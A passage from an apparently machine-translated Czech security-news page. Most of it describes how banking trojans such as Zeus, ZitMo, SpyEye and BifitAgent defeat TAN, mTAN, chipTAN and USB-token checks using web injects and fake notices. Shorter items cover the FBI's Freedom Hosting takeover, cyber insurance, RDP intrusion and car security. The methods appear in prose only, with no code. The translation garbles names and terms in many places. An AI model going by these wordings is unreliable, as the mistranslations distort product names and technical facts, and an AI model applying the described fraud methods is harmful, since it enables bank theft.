Dodatečné informace zadané uživatelem se dostane do rukou kybernetických zločinců ", ale nedosahuje banku tak, jak je zachytil, když jsou data posílána na bankovní server.Proto ani oběť, ani banka neví nic o podvodu.
Ve většině případů, zločinci raději používat kombinace různých technik - tudy se zlepšit své šance na úspěšné infekce a zvýšit účinnost škodlivého programu.Bankovní Trojan Zeus (Zbot) je jedním z nejmodernějších high-tech, trojských koní používaných zločinci.Mnoho druhů tohoto škodlivého programu existují po celém světě, a navíc jeho funkční klon - byla vytvořena - Trojan SpyEye.
Zde jsou některé z funkcí, Diův:
Trojan krade veškeré informace, které má uživatel "vzpomínat na počítači", např. kontrolou "Uložit heslo" políčko.
Trojan stopy, které klávesy uživatel stiskne.Pokud se virtuální klávesnice používá, Zeus zachycuje obrazovky oblast kolem kurzoru v době, kdy levé tlačítko myši je klepli.V důsledku toho, cybercriminal získá informace o tom, které jsou stlačená na virtuální klávesnici, a tak zná uživatele přihlašovací údaje.
Zeus používá webové injekce.Když uživatel otevře webovou stránku, která je uvedena v konfiguračním souboru Zeus, Trojan přidá nové pole, ve kterém je uživatel vyzván k zadání důvěrné finanční informace, které jsou předmětem zájmu zločinci.
Zeus je schopen obejít nejmodernějších systémů bankovní záruku (viz diskusi níže).
Tento škodlivý program se šíří pomocí sociálního inženýrství a využití zranitelnosti v populárním softwaru společnosti Microsoft, Oracle, Adobe, atd., když uživatel navštíví nedůvěryhodné weby.Odkazy na tyto stránky jsou většinou distribuovány ve spamu.
Zeus je schopen krást důvěrné informace o získání neoprávněného přístupu k účtům v největších světových bank.V roce 2012 jsme zaznamenali 3524572 pokusí nainstalovat tento škodlivý program na 896.620 počítačích s produkty společnosti Kaspersky Lab instalovaných na nich, které se nacházejí v různých zemích.
2012 Mapa Zeus / Zbot Infekční pokusy (KSN statistika)
Obcházení druhý faktor
Jak bylo uvedeno výše, banky investovat hodně úsilí při ochraně svých klientů.Bankovní trojské koně byly tak účinné, že banky mají zavést další ochranné vrstvy - nástroje identifikace uživatele, se standardními přihlašovací údaje, které tvoří tzv. dvoufaktorovou autentizaci.S dvoufaktorové autentizace na místě, že nestačí znát uživatelské jméno a heslo k získání kontroly nad bankovním účtu.
Nicméně, zločinci viz upgradovaný ochranu jako novou výzvu, a dál hledat nové způsoby, jak to obejít.
S dvoufaktorové autentizace na místě, banky používají jednorázová hesla (Transaction Authentication Number, TAN).V praxi, které mohou být ATM skluzu s kódy vytištěné v něm, SMS zprávy s jednorázovými hesly, která banka zasílá mobilní telefon uživatele (MTAN), nebo dokonce speciální zařízení (chipTAN).
Chcete-li obejít výše uvedených bezpečnostních systémů, zločinci vytvořili nové metody krádeže dat a upravovat jejich techniky sociálního inženýrství.
Jednorázové heslo (TAN)
Bankovní Trojan Zeus sadu nástrojů ve svém arzenálu, který může obejít různé druhy dvoufaktorové autentizace.Zeus používá zajímavý nástroj pro sběr jednorázová hesla, která uživatelé tisknou v bankomatu.
Jakmile uživatel je registrován u on-line bankovního systému a zadá své jednorázové heslo, Zeus krade autentizačních dat, zobrazí falešné oznámení, která říká, že aktuální seznam jednorázových hesel je neplatná, a vyzve uživatele k odběru Nový seznam hesel.
Chcete-li získat "nový seznam", musí uživatelé zadat své současné Tan-kódy, údajně proto, aby si je zablokován do příslušných polí ve formuláři vytvořil Zeus pomocí metody webové injekce.
Všechny přihlašovací údaje, které jsou zadány jsou zaslány počítačovými zloději, kteří se bezprostředně používají pro přenos oběti aktiv na jejich účty.
Příklad falešného oznámení vytvořil Zeus
MTAN
Ve spolupráci s mobilním Zeus Trojan-in-the-Mobile (ZitMo), můžete Zeus ukrást jednorázová hesla uživatelů, které přicházejí do mobilního telefonu.
To je, jak dva Trojans interakci s uživateli:
Když uživatelé navštíví přihlašovací stránka internetového bankovnictví, Zeus používá webové injekce vytvořit další pole v této stránce, kde jsou uživatelé vyzváni k zadání telefonního čísla, údajně obdržet certifikát aktualizace.
Pokud uživatelé zadejte přihlašovací údaje požadované pro povolení a telefonní číslo, Trojan krade informace a odešle ji na své majitele.Po nějaké době přijde SMS na uživatele smartphone, který obsahuje odkaz na "nové bezpečnostní list".Když uživatelé pokusí nainstalovat tento falešný certifikát, dostane smartphone napaden místo.
Tímto způsobem zločinci získat přístup ke všem údajům potřebných na dálku ovládat uživatele bankovní účet, a kradou peníze z něj.
chipTAN
chipTAN je další způsob ověření pomocí dvou faktorů.Používá se západoevropskými bankami a vyžaduje, aby každý klient mají speciální TAN generátoru zařízení.Máte-li nastaveny transakci na bankovním místě, uživatelé dát své bankovní karty do chipTAN a zadejte kód PIN.
Další uživatelé přepnutí přístroje vedle svého monitoru počítače zkontrolovat podrobnosti transakce probíhá.Po kontrole podrobnosti transakce podle následujících údajů zobrazených na displeji přístroje, uživatelé zadat další kód ze zařízení pro potvrzení transakce.
ChipTAN stránka na německé banky stránek
chipTAN je nyní nejmodernější a efektivní bankovní bezpečnostní nástroj.Bohužel, tvůrci SpyEye bankovnictví Trojan se naučili obejít tento high-tech bezpečnostní nástroj stejně.
Pomocí webové injekce, Trojan upravuje uživatele seznam bankovních transakcí.Z tohoto důvodu, když uživatelé přihlášení do on-line bankovního systému, vidí, že bankovní převod na velkou sumu dorazil, a zůstatek účtu změní.
SpyEye, ve jménu on-line bankovního systému, upozorní uživatele, že tato operace byla provedena omylem, a že účet bude blokován, dokud se vrací součet se údajně obdržel.
Aby se tomu zabránilo, uživatelé zahájit novou platební operace vrátit peníze.SpyEye vyzve uživatele s požadovanou bankovní účet a sumou peněz.Trojan nemusí krást generovaný kód chipTAN, protože uživatelé zadejte kód vlastníma rukama a potvrdit transakci.
Po tomto, aby Trojan manipuluje s webové stránky se zobrazí původní zůstatek na bankovním účtu, zatímco peníze jsou zaslány zločinci.
Německá banka varuje své klienty o oznámení chybného převodu peněz
Jak je vidět, tato metoda nevyžaduje ani další technické triky na straně zločinců, útok je založen na webových injekce a sociální inženýrství.
Známka
Token je USB zařízení sloužící jako další bezpečnostní nástroj a obsahující jedinečný klíč, který systém vyžaduje pokaždé, když uživatel provede platbu operaci.Tvůrci bankovního Trojan číhá nejedno efektivní způsob, jak obejít tuto ochranu:
Uživatelé iniciovat platební operace v internetovém bankovnictví a zadejte údaje.
Trojan číhají zachycuje údaje o platbě a čeká na systému požádat token.
On-line žádost bankovního systému žeton, a uživatelé představují jejich kredit vložením USB tokenu do příslušné zásuvky.
Trojan zachycuje tuto událost, po které se ukazuje, falešný "modrá obrazovka", která informuje uživatele o tom, že výpis fyzické paměti je vytvořené pro následnou analýzu, a žádá uživatele, aby přepnout počítač vypnout před dokončení operace.
Falešný modrá obrazovka zobrazí Trojan
Zatímco uživatelé čekat na "provoz" na dokončení (a zatímco jejich žetony jsou v portu USB), cybercriminal přístupu na tyto účty na dokončení příkazu k úhradě ve jménech uživatelů a převede peníze na jiný účet.
Mezi škodlivé programy Trojan-Banker.Win32.BifitAgent rodiny použít jinou metodu, aby se vyhnula USB tokenu.Tyto škodlivé programy jsou určeny k útoku uživatelů online bankovnictví software vyvinutý ruským BIFIT výrobce softwaru.
BifitAgent škodlivý program se skládá ze dvou hlavních modulů, které běží na počítači oběti - spustitelný soubor a archiv Java.Když se škodlivý program běží, hlavní spustitelný modul, který umožňuje komunikaci s C & C serveru, pracuje současně s škodlivých souborů JAR a umožňuje útočníkům změnit jakékoliv JAVA kód v okamžiku, kdy jsou bankovní transakce prováděny.Hlavní funkce kódu v jazyce Java obsažené v škodlivého souboru JAR je falešný údaje použité při bankovních transakcích na infikovaném počítači, aniž by uživatel nevšimne.Použití USB tokenu v dané transakce není překážkou cybercriminal protože token pouze znaky transakcí po data byla falešnou identitou.V důsledku toho, že uživatelé "peníze přistane v počítačovými zloději účtů.
Jak se mohu bránit?
Banky a platební systémy investovat hodně úsilí ke zlepšení bezpečnostní situace svých klientů, ale to samo o sobě nestačí znamenat uživatelé mohou být uvolněný o bezpečnost jejich majetku.Počítač uživatele musí být zabezpečeny proti krádeži platebních údajů bankovní trojské koně a další malware - to je zajištěno tím, že chrání před škodlivým kódem prohlížeče, ochrana klávesnice vstupy a antivirové technologie, které zabraňují průniku škodlivého softwaru systému.Přesto ani antivirová ochrana samo o sobě, tam musí být způsob kontroly legitimitu webové zdroje (stránky banky, platební systém, internetový obchod atd.) a zabezpečené připojení k němu.
Žádná finanční transakce mohou být považovány za bezpečné, pokud tři klíčové komponenty jsou chráněny:
1..Počítač, ze kterého uživatelé přistupovat ke svým online bankovnictví účty
Antivirus chrání systém jako celek před škodlivými programy, speciální složka v antivirus chrání prohlížeče používané pro přístup k on-line bankovního systému.
Antivirus používá řadu ochranných mechanismů, díky nimž je obtížné nebo nemožné pro škodlivý kód proniknout do systému, spuštění a spustit na počítači.Tyto ochranné mechanismy fungují ve všech fázích bankovní operaci.
Pokud neznámý škodlivý program se podaří proniknout do systému, je hlavním úkolem komplexního antivirového řešení je ochrana dat.Za tímto účelem musí být výrobek sledovat prohlížeč běžící procesy a chrání ji před manipulací v jiných aplikacích.Doplňková ochrana je zde zajištěna virtuální klávesnici, s níž mohou uživatelé bezpečně vstoupit na podrobnosti o platební operace (číslo platební karty, CVV2/CVC2, osobní údaje apod.) do prohlížeče.
2..Komunikační kanál mezi klientem a serverem
Zabezpečené připojení brání zachycení údajů sdělených z klienta na server.Komunikační kanál je zajištěna použitím speciální protokoly (TLS / SSL), které zaručí, že šifrování sdělených údajů.Místo, na které je navázáno je identifikován pomocí certifikátu.
Místa bank a platebních systémů majídigitální certifikáty, které jsou vydané a podepsané certifikační autority.Tyto certifikáty ověřit pravost stránek a legitimitu jejího vlastníka.
Falešné stránky buď nemají certifikáty nebo používat falešné certifikáty.Nicméně, může být složitější situace také existují.Například, může Trojan, který získal oporu v systému upravit soubor hosts a vzít uživatelů na webu, který je přesnou replikou původního místa.Stejné Trojan můžete nainstalovat extra kořenový certifikát oběti počítači, který by ověřil oprávněnost falešné potvrzení o kybernetických zločinců "webové stránky, při kontrole v prohlížeči.Tak, že zločinci jsou schopni rozluštit všechny údaje předávané v prohlížeči z falešné stránky.
Antivirové řešení musí nezávisle ověřit pravost certifikátu zabezpečení, spíše než se spoléhat na operačním systému a prohlížeče pro to.Pokud certifikát není legitimní uživatelé upozorněni.
3..Na stránkách finanční organizace
Počítačoví zločinci řemeslo svých stránek, aby vypadal jako oficiální stránkách bank a platebních systémů.Certifikát legitimita kontrola je účinná pouze v případě, že uživatelé zadat správnou URL bankovním webu.Pokud uživatelé jít na bankovní místě po falešném odkazu z dopisu phishing, sociální sítě nebo z výsledků vyhledávání, musí být anti-phishing komponenty zasáhnout.Odkazy jsou kontrolovány proti databázi nedůvěryhodných webových zdrojů.Pokud se uživatelé pokusí navštívit nelegitimní stránky, obdrží varování před hrozbami.Aby se zabránilo pádu obětí phisherů, je vhodné navštívit bankovní stránek pomocí příslušný seznam z antivirový produkt.
V neposlední řadě, vysoká úroveň vlastní ochrany, je nezbytnou součástí řešení kvality bezpečnosti.Pokud byl škodlivý program, dokáže narušit práci antivirového řešení, vytváří mezeru v bezpečnostním systému a ohrožuje bezpečnost budoucích transakcí.
Klíčové prvky v bezpečné transakce
Je to právě tato koncepce zabezpečení online transakcí, která je implementována v nouzovém Money, Kaspersky Lab software řešení.
Bezpečné transakce Scénáře
Podívejme se nyní, jak je zabezpečená transakce prováděné podle Bezpečné peníze.
Komplexní antivirová ochrana zabraňuje pronikání škodlivého softwaru z počítače.Zejména bezpečnostní řešení kontroluje systém zranitelnosti v operačním systému nebo aplikace.Pokud uživatel nemá pravidelně aktualizovat systém, a pokud tam jsou chyby v systému, které byly uzavřeny vývojář, bezpečnostní řešení varuje uživatele o možném nebezpečí a vyzve k aktualizaci zranitelný software.
Pokud uživatelé ručně zadejte adresu URL nebo následovat odkazy z písmen nebo sociálních sítí, anti-phishing modul kontroluje, zda je URL v databázi nedůvěryhodných webových zdrojů.Pokud se jedná o phishing nebo škodlivých URL, uživatelé obdrží varování.
Pokud je stránka v URL je nalezen v databázi, uživatelé jsou vyzváni k otevření tohoto webu v zabezpečené prohlížeči.
Antivirus zkontroluje certifikát použitý k vytvoření zabezpečeného připojení.Požadavek je odeslán na cloudové služby ověření certifikátu.
Pokud certifikát není legitimní, uživatelé obdrží upozornění, že spojení nelze navázat.Bezpečné peníze vysvětluje, proč je spojení považováno za nedůvěryhodné.
Uživatel Oznámení v nouzovém Money Kaspersky Lab pro vykazování neplatný certifikát.Ve stejné době, je toto potvrzení specifické považovaná podle prohlížeče
Pokud je certifikát je důvěryhodný, zabezpečený prohlížeč vytváří šifrované spojení s bankovním webu.
Je bezpečnější používat seznam bank v bezpečnostní řešení otevřít přihlašovací stránku pro online bankovnictví nebo k zadání klienta stránku platebního systému.
V tomto případě je bezpečné navázání spojení a banky legitimní stránky je otevřen okamžitě pomocí zabezpečeného prohlížeče.
V nouzovém režimu Money, okno pomocí zabezpečeného prohlížeče má černé zelené pozadí
Bezpečný Money aktivní režim, data zadaná na stránky banky, ať už z virtuální klávesnice nebo pravidelné, je chráněn speciálním ovladačem, který nedovolí zločinci zachytit to.
Tak, platební transakce chráněny před bankovních trojských koní pomocí antiviru, pomocí zabezpečeného prohlížeče proces a bezpečné vstup z klávesnice.Pravost platebního systému nebo internetového bankovnictví webu je ověřena kontrolou na odkazy a digitální certifikát.
Účinnost řešení založené na konceptu bezpečných on-line transakcí bylapotvrzenazkušební laboratoře.
Závěr
Banky, platební systémy a další finanční organizace investovat hodně úsilí chránit jejich infrastrukturu a klienty před počítačovými zločinci.Nicméně, zločinci přetrvávají i při vývoji malware, přijít s novými způsoby, jak obejít bezpečnostní nástroje a ukrást bankovní údaje uživatelů.V této fázi je bankovní uživatelů Informace o nejlépe chráněny antivirových produktů a věnoval řešení, která může upozornit na nebezpečí, zabránit infekci včas a nenechá mezeru za nového bankovního Trojan.
Důkaz-založený systém zabezpečit auto
17 září 2013 Zabezpečení | Hacking
Digitální systémy v dnešním propojeném automobilu, včetně motoru, populárně naučné pořady a telematických systémů, zajišťují komunikaci, s pohodlím, informace, bezpečnost, údržba, bezpečnost a postupují směrem funkcí ovladače minimalistické a dokonce i zcela samostatně hnacích vozidel.
Množství dat generovaných rychle roste na podporu těchto funkcí. V kombinaci s integrovaným mobilním zařízením, GPS data a sociální profily, připojit auto se stává mocným sběratel a vysílání informací. Tato data jsou vysílána přes veřejné rozhlasové a televizní vysílání a uloženy v cloudu. Vzhledem k tomu, moderní připojen vůz má až 100 milionů řádků softwarového kódu, když jsou data více důležité pro provoz vozidla a připojeného vozu ekosystému, je důležité, aby se aktivní integritu ověření kritických systémů v reálném čase, přičemž vzájemná Auditovatelnost zajišťuje soukromí, ochranu, bezpečnost, legálnost a pojistitelnost. Základním problémem současných bezpečnostních modelů je, že je těžké zjistit (a následně dokázat), porušení událost, pokud na stěnu nebo klíče jsou ohroženy. S takovým útokem, je nemožné, aby byla zajištěna jejich spolehlivost, digitální aktiva, jak to může být změněn nebo přístupem neoprávněných osob (kteří pak zakryli stopy). Guardtime je Keyless podpis Infrastructure ( KSI ) je alternativní technologie pro ověřování elektronických dat . KSI se mění hru, s účinnou atestační založené na modelu zabezpečení, připojením složité matematické "značky" přímo do dat, což činí jakékoliv přístup k těmto údajům zdokumentovaná a ověřitelné události. čas, identita, autenticita a historické provenience data jsou chráněna a ověřeny v reálném čase pomocí Guardtime patentované "důkaz založený na" technologie, namísto ochrany poskytované administrátory nebo pověření, které mohou být kompromitována. Symphony Teleca (STC) a Guardtime oznámily partnerství, aby tyto nové ochrany, bezpečnosti , údržba, spolehlivost a schopnosti pro zvýšení Connected Car ekosystém. Mají vytvářet řešení s cílem zvýšit bezpečnost a spolehlivost připojeného životního cyklu vozu softwaru, ať už z prováděcích mechanismů, jako Over The Air (OTA), nebo přímo z údržby portálu. S hodnotou softwaru vozidel stanovených zvýšit až o 50 procent do roku 2020, je nezbytné pro OEM efektivně řídit jejich životní cyklus softwaru. Jak více a více dat prochází veřejné rozhlasové a televizní vysílání a stále bezpečné sítě umožňují nezabezpečené Mobilní zařízení připojit k jejich sítě, problematika integrity dat, Software Assurance a vzájemné ověřitelnost zůstává nezodpovězenou otázkou.
FBI potvrzuje, že byly za převzetí Freedom Hosting je
17 září 2013 Hacking | KyberSecurity
Agent FBI svědčit u soudního jednání, kde byla projednána předmětem kauci za svobodu vlastník Marques Hosting Eric Eoin potvrdil, že FBI, opravdu, měl ruku v převzetí hostitele serveru a nastavení stránky hostované na ně sloužit de- anonymity škodlivého softwaru návštěvníkům, Kabelové zprávy . je Freedom Hosting dobře známý pro umožnění stránky obsahující dětskou pornografii, která se má uskutečnit na svých serverech, a byl terčem útoků od Anonymous v roce 2011, ale mezi lokality je hostované byly také "dobré" služby jako je TorMail. Marques byl zatčen v Dublinu dne 4. srpna a ve stejný den všechny weby hostované Freedom Hosting začala slouží "kvůli údržbě" zpráva. Zatímco uživatelé spekuloval, on-line, co se děje, oni zpočátku nepodařilo zjistil, že spyware byl sloužil na některé z nich. Vědci analyzující kód šlo na stránkách potvrdila, že byl vytvořen s cílem zneužít zranitelnost ve Firefoxu. "Přestože se chyba týká uživatelů Firefox 21 a pod exploit se zaměřuje pouze ESR-17 uživatelům. Protože tento útok byl nalezen na Tor skrytých služeb podle všeho je to, že Tor Browser Bundle (TBB) je založena na Firefox ESR-17 ", Daniel Veditz, olovo bezpečnosti na Mozille , se domníval, v té době. sloužil malware má jeden jediný cíl - vyhledat oběti MAC adresu a hostname Windows a odeslat tyto informace na server ve Virginii provozuje FBI. Výzkumní pracovníci se domnívají, že je to FBI neslavný CIPAV (počítač a Internet Protocol Address Verifier) spyware, který byl použit v předchozím dětské porno bodnutí operace. Zatímco svědčit před irského soudu, FBI dozorčí zvláštní agent Brooke Donahue neřekl, jak může předsednictvo se podařilo převzít Freedom Hosting serverů (pronajaté od obchodního francouzského poskytovatele hostingu), ale má společné, že Marques se podařilo krátce spustit ven a změňte hesla předtím, než konečně a definitivně uzamčení z nich sám. Agent řekl soudu, že Marques byl hledá do získávání ruské občanství, aby se mohl dostat mimo dosah prosazování práva Spojených států, že je stále v držení jeho vlastní cestovní pas a prokázal ochotu používat falešné Prodám web hosting prostoru od ruské společnosti, a to měl spoustu peněz, které má k dispozici -. všechny věci, které by dělat to pro něj jednodušší uniknout ze země, kdyby se být poskytnuta kauci Soudce zřejmě našel tyto argumenty přesvědčivé, a rozhodl, že Marques bude muset zůstat ve vazbě až do jeho vydání slyšení.
NIST kybernetické rámec: Vaše pojišťovna se dívá
17 září 2013 Zabezpečení
Pokud NIST přišel s novým standardem pro kybernetické bezpečnosti , by vaše organizace pojistit pro počítačové rizik při měření proti tomuto standardu ? To bylhlavní tématem diskuse v Dallasu minulý týden nejpozději v sérii workshopů , které se snaží , aby se doladila navrhovaný NIST kybernetické rámec ( jsme diskutovali předchozí SSR schůzky Žijeme tady a bezpečnosti i zde , plus podcast zde).
Cyber pojištění bylo tématem panelu moderovat Tom Finan Ministerstva pro vnitřní bezpečnost a včetně Peter Foster,pojišťovací makléř se Willis Group, Mark Camillo AIG , Merrill Toby ACE USA, a Laurie Schwarz z Locktonu . Zde je, jak DHS jde o kybernetické pojištění:
Cybersecurity pojištění je určeno na zmírnění ztrát z různých kybernetických incidentů , včetně narušení dat , síťové poškození, a kybernetické vydírání . Ministerstvo průmyslu a obchodu popsal kybernetické pojištění jako "účinné, tržním způsobem zvyšování kybernetické bezpečnosti ", protože to může pomoci snížit počet úspěšných kybernetických útoků podporou široké přijetí preventivních opatření , podporovat zavádění osvědčených postupů tím, že založí pojistné na pojištěného úroveň vlastní ochrany a omezení úrovně ztrát, které firmy čelí po kybernetickém útoku.
Samozřejmě, že NIST je standardy agentura, nepojištění či subjektem pro prosazování práva . Ale NIST je v obchodu , a to za cíl poskytovat normy, které jsou obecně přijímány přes průmyslu , například , pojišťovny , kteří hledají nějaký způsob, jak měřit , zda je váš obchodní komíny až po "zlatý standard" a účtovat pojistné odpovídajícím způsobem. V současné době , by mnoho firem mohli kvalifikovat pro politiky ( podle alespoň jednoho Rozhodce ) , ale pojišťovny se zdají silně zaujatý v některých klíčových ukazatelů , jako zda je vaše firemní kultura je proaktivní nebo reaktivní s ohledem na rozvíjející se bezpečnostních otázek . Myslíte si, zůstat na vrcholu změny , nebo se více pasivní stand- back- a - watch přístup, pokud jde o bezpečnost ? Odpovědi na tyto otázky by mohla započítat do ceny , kterou zaplatíte za kybernetické pojištění ( zde je příklad takového pojištění , které nabízí AIG , a ACE USA).
Když pojišťovny rozhovor pro kybernetické politice , budete chtít přesvědčit je, že máte velmi dobré pochopení o tom, kde se nyní nacházíte , kam jít dál, a jak máte v plánu dokázat všechno. Obecně budete chtít ukázat, že jste vzhledem k vaší bezpečnostní situace některé významné myšlenky.
Jeden účastník diskuse rád se zeptat potenciálním klientům o svých nedávných ztrát zážitky. Pokud řeknou , že jsem neměl nic , on se zamračil podezřele a zaboří hlouběji , zkoumal , jak vědět, zda byly porušeny , nebo zda mají postup na místě poznat vůbec.
Ale co přesně bude kryta pojištěním kybernetické ? To je stále méně jasný. Například , jestliže tam je masivní rozsáhlé akci , řekněme kybernetické Katrina ve stylu digitální hurikán, který vyhladí celou pás technologických služeb , kteří platí za to, co , komu a za jakých okolností ? To je otázka kapacity , a jen jedna z otázek, DHS se věnoval týkající se kybernetické pojištění zde .
A pak tam jsou akciové trhy . Společnosti, které pojišťují finančních transakcí lidi pojistit velmi, velmi velké množství transakcí. Myslíš, že mnoho biliony dolarů není příliš mnoho dní . Hmotnost digitální troska v jejich světě by jistě nepříjemně děsivé ( pro ně i pro nás ) , a aby se nároky oddělení krčit .
Jo , a pokud je digitální Katrina , neuvidíte to přijde v televizi, předchází blížící se pevninu lijáky mlátičce na půl dne (nebo více) , stane se to v sekundách (možná mikrosekund ) s malým upozorněním , stejně jako v nedávné ATM loupeže , kde milionů dolarů ztrátové hodin může být normou.
Takže to, co je maximální celková společnosti dopadů pojištění lze důvodně předpokládat, že zvládnout ? To je otázka,panel uvažoval . Jeden účastník diskuse se domníval, že by mohly zvládnout 350 milionů dolarů dolarů událost , ale pravděpodobně 10 z těch, ve stejnou dobu . Ale pojišťovny lidé nejsou jen sedí na svých hýždích . Pojistné výpočty jsou založeny na velikosti a typu dostupných dat , a tam prostě není ještě dost , aby veškeré pojistně-matematické výpočty práci, ale oni zpomalení se tam dostat .
Zatímco pojištění Cyber průmysl je v plenkách, porušení oběti nezdá dočkat, až z klusu do posledního detailu každé porušení vzpružit pojistně tabulky , jako celý výpis všech detailů může sloužit jako nezáměrné poplašných upozornění pro zákazníky a uživatele, kteří chcete jistotu, že jejich data jsou chráněna . To platí zejména v okamžiku, kdy soutěžící po silnici neodhalí údaje , což by mohlo dvoření přízeň na trhu , protože "se objeví " být více v bezpečí. Chtěli byste pochlubit vaší organizace údaje pro všechny vidět , aby znalci radost?
A co dostanete za své pokrytí ? Jeden účastník diskuse zdůraznil sedm různých kategorií " kybernetické pojištění ", v rozmezí od fyzické ztráty na reputaci pojištění a houf dalších. Pokud je vaše politika reaguje na ztrátu zasláním stoh nových serverů , které mohou dělat jen málo zmírnit celkový ránu na váš veřejný obraz. A o to právě jde : budete opravdu potřebovat komplexní pokrytí, a dokonce ani nemusí vědět , jak hodnotit to, co potřebujete . A ani se mohou váš agent . Opět platí, že nejste sami , protože pojištění Journal poukazuje na to tady.
Ať se stane cokoliv , NIST Cybersecurity rámec doufá, že na podporu v pokračujících jednáních o pojistitelnosti ( a mnoho dalších věcí ), které budou potenciálně ovlivňují osoby, které poskytují to, co lze stále považovat za důležité součásti naší národní vzdělávací infrastruktury.
Příspěvek NIST kybernetické rámec: Vaše pojišťovna se dívá poprvé objevil na Žijeme zabezpečení.
Remote Desktop ( RDP ) Hacking 101: Vidím svůj desktop od tady!
17 září 2013 Viry | Hacking | Zabezpečení
V poslední době jsme zaznamenali nárůst zpráv o malwaru instaloval přes Remote Desktop Protocol ( RDP ) . To je silný protokol, který byl nechat si zobrazit plochu systému Windows " na drát " na druhé straně zeměkoule (nebo zpět na své domů z kanceláře ) pro více než deset let . Je smutné, že zatímco RDP mohou sloužit řadu užitečných účelům od dálkového ovladače " hands-on " podporu konfigurace a provoz serverů , ve špatných rukou může býtdálkové ovládání zbraní, která umožňuje špatní herci na zombify počítač a nechte jej dělat jejich nabízení .
Jak se to mohlo stát? Pokud je váš počítač " naslouchá " pro signál RDP ( typicky přes portu TCP 3389 ) , a je připojen k internetu , bude reagovat, kdyžvzdálený uživatel požádá , pokud je to živé . Pro vzdálené uživatele , budou prezentovány s přihlašovací obrazovce na ploše, často bez povšimnutí vás ( zvláště pokud je počítač zapnutý a právě stalo, že se od ní ) . V tomto bodě, bude váš počítač vyzve je k zadání hesla - obvykle . Pokud máte špatně nakonfigurovaný RDP nastavení na vašem počítači však může jen nechat je dál -li tomu tak , je to jen začátek své problémy .
Co může PRV vetřelci dělat? Máte-li oprávnění správce přiřazené k uživateli se přihlásí as, mohou se počítač po neomezenou rotaci kolem bloku , a to od jeho vypnutí , restartování jej , instalace softwaru (včetně malwaru ) , nebo jen s rozhlédnout najít dokumenty souborů s vaší kritické osobních údajů v nich, jako je bankovnictví, účetnictví, nebo jiné informace a pak duch je pryč celé síti jejich domácích počítačích pro hanebné účely .
Jak se vám zastavit tohle všechno? První věc je vědět, jestli jste RDP povolen . To je snadné zkontrolovat z ovládacího panelu v části Systém > Vzdálená Nastavení> Připojení ke vzdálené ploše ( pod Windows 7 , ostatní operační systémy se liší ) .
Windows 7 RDP blokování
Všimněte si tento test má počítač Remote Desktop (RDP ), se zdravotním postižením, což je v pořádku pro testovací účely , protože nikdo by neměl být přihlášení vzdáleně tohoto rámečku. Ale pokud se rozhodnete povolit připojení nějaký čas trvat, definovat, kdo si myslíte, že by mělo být připojení pomocí " Vybrat uživatele ", dialogové okno :
RDP- uživatelé
Všimněte si , že jste uživatel přihlášen jako již nemá přístup ( zahalené v příkladu ) . Když vzdálenému útočníkovi přijde volání by to mohlo způsobit problémy pro bezděčná uživatele, který je přihlášen jako administrátor . Velmi pravděpodobně protivníci budou usilovat o získání zvýšené přístup a přihlášení jako správce jerychlý způsob, jak to udělat . Nemohou-li se pár, který je platný uživatel s snadný-k - uhodnout heslo , že mám klíče od počítače korunovačních klenotů .
V poslední době jsme zaznamenali nárůst počtu RDP - útoky pomocí trojského koně Win32/Filecoder.NAH (také známý jako ACCDFISA ), která se pokouší šifrovat soubory na vašem počítači a výpalné platit padouchy na jejich zpřístupnění .
Nevadí , že je to vždy dobrý nápad poslat peníze na podvodníky v systému , jako je tento (zejména prostřednictvím kreditní karty , který prakticky zaručuje další podvod ) , může celá věc se jednoduše vyhnout tuto službu , pokud nepotřebujete to a chránit jej , pokud nemáte .
Když už mluvíme o ochranu , kromě nepoužíváte snadno uhodnout jména uživatelů by silné heslo také jít dlouhé cesty směrem k ochraně účtu. Jestliže hackeři programově "odhadnout " vaše heslo, protože je založen na jednoduché slovo - , že budou poměrně rychle . Na druhou stranu, pokud je to složité , což znamená, kombinace malých a velkých písmen, číslic a symbolů ( čím déle , tím lépe) , jejich úkolem se stává mnohem více skličující.
Pokud potřebujete použít RDP a jsou více technicky nakloněn, můžete změnit port, na kterém RDP " naslouchá " pro připojení (výchozí port je 3389 ) . Microsoft má článek o tom, jak to v mnoha verzích systému Windows. Najdete zde také řadu možných řešení diskutovaných na přetečení zásobníku .
A na téma vzdálené plochy podporu , zůstat ve střehu, pro ty "Podpora systému Windows ", lidi, kteří telefon a zeptat se vás na instalaci speciálního software pro vzdálený přístup , aby mohli " opravit " počítač. Padající pro tento podvod může skončit špatně. Pro více informací o to, podívejte se na článek David Harley zde .
Příspěvek Remote Desktop ( RDP ) Hacking 101: Vidím svůj desktop od tady! se objevil na prvním místě Žijeme zabezpečení.
Náhlé - hat skenování může být nejbezpečnější klíče od auta všech dob
17 září 2013 Hacking | Zabezpečení
Náhlé skener může být použit jako konečný " biometrického klíče od auta ", podle výzkumníků na University Tottori - a dokonce zabránit carjackings , nelicencované ovladače užívající kolo, nebo nehod zaviněných řidiči s usínáním .
Biometrické systémy jsou široce projednávána v současné době , vzhledem k zahrnutí Apple systému otisků prstů číslo ve svém novém iPhone 5S .
Ale pro některé systémy , metody ověřování , jako jsou snímače oční duhovky a rozpoznávání otisku prstu jsou nedostatečné , Isao Nakanishi na Graduate School of Engineering uvádí v článku v časopise International Journal of biometrie .
Otisk prstu a duhovky systémy jsou "jednou a záznam " autentizace , Nakanishi tvrdí - a pro vozidla přepravující cenné komodity , nebo dokonce vozidel veřejné dopravy , nemusí to stačit .
"Měření řidičovy mozkové vlny stále - přes senzory v pokrývky hlavy u řidiče pokrývky hlavy - by bylo jednoduché a umožnilo ověření , které nemohly být spoofed podvodníka , " uvádí zpráva . "Pokud špatné mozkové vlny se měří , je vozidlo bezpečně zablokováno. "
Tento systém by snímat alfa- beta mozkové vlny řidiče , když jeli k enture , že jsou v dobré kondici , aby tak učinily .
" Důležité je, že by probíhající ověřování ovladačů, které používá své mozkové vlny usnadnit jednoduchý způsob, jak nezbavit spuštění motoru , pokud je řidič pod vlivem alkoholu s léky nebo alkoholem , nebo dokonce jen příliš unavený, protože jejich mozkové vlny se neshoduje s jejich normální vzor za takových okolností , " uvádí zpráva .
"Pokudpodvodník nahradí ověřeného uživatele v uneseného auta , například takové systémy nemají žádný způsob, jak ověřit , že osoba, v současné době jízdy auto je legitimní ovladače a že únosce nebyl hozen majitele z auta nebo přivázal v zavazadlovém prostoru . Systém ověřování na základě hesla nebo duhovky skenování , který opakovaně kontroluje , že řidič je právní řidič vozidla by neměla být v bezpečí. "
